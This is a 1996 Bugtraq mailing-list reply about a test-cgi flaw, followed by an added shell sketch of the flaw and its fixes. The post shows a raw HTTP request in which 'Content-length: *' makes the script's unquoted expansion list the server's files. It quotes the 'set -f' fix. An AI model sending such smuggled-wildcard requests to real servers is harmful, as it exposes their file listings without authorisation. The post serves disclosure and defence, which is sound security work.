[3804] in bugtraq


Re: Vulnerability in test-cgi

daemon@ATHENA.MIT.EDU (Evgene Ilyine)
Tue Dec 17 12:00:31 1996

Date: 	Tue, 17 Dec 1996 12:24:32 +0300
Reply-To: Evgene Ilyine <esi@ptc.spbu.ru>
From: Evgene Ilyine <esi@ptc.spbu.ru>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
In-Reply-To:  <199612040417.WAA07585@cegt201.bradley.edu>

On Tue, 3 Dec 1996, Joe Zbiciak wrote:

> string.  Therefore it's still vulnerable in its default configuration.
> Adding "set -f" as the second line of the script closes the hole completely.

  Yes -- otherwise this hole would look like a virus; here is another
mutation:

<esi@snark:~> (268) telnet localhost 80
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
post /cgi-bin/nph-test-cgi http/1.0
Content-type: x
Content-length: *

.. skipped
CONTENT_LENGTH = ( here you'll get a list of files)

=============================================================
postmaster@spbu.ru                              Evgene Ilyine
http://www.ptc.spbu.ru/~esi               Work phone:428-4527
=============================================================
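
The `Content-length: *` variant above and the quoted `set -f` fix both come down to an unquoted variable expansion in the script. The sketch below is an added example, not part of the original post or of the distributed test-cgi: the echo line is assumed from the output shown above, and the function names and sandbox file names are constructed.

```shell
#!/bin/sh
# Added example: models the test-cgi line that prints CONTENT_LENGTH.
# The echo statements are assumed from the output shown in the post,
# not copied from the distributed script.

# Unquoted expansion: the shell globs the header value against the cwd.
render_unquoted() {
    ( cd "$1" && CONTENT_LENGTH=$2 && echo CONTENT_LENGTH = $CONTENT_LENGTH )
}

# Mitigation from the thread: "set -f" disables pathname expansion.
render_set_f() {
    ( cd "$1" && set -f && CONTENT_LENGTH=$2 && echo CONTENT_LENGTH = $CONTENT_LENGTH )
}

# Alternative hardening: quote the expansion so it is never globbed or split.
render_quoted() {
    ( cd "$1" && CONTENT_LENGTH=$2 && echo "CONTENT_LENGTH = $CONTENT_LENGTH" )
}

# Constructed sandbox standing in for the cgi-bin directory.
make_sandbox() {
    d=$(mktemp -d) && : > "$d/nph-test-cgi" && : > "$d/test-cgi" && echo "$d"
}

# Print all three renderings for a wildcard value and for a normal one.
demo() {
    dir=$(make_sandbox)
    for value in '*' '1024'; do
        echo "header value: $value"
        render_unquoted "$dir" "$value"
        render_set_f    "$dir" "$value"
        render_quoted   "$dir" "$value"
    done
    rm -rf "$dir"
}

demo
```

Quoting protects only the lines that are quoted, while `set -f` covers every expansion in the script, which is why the thread recommends it as the second line.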
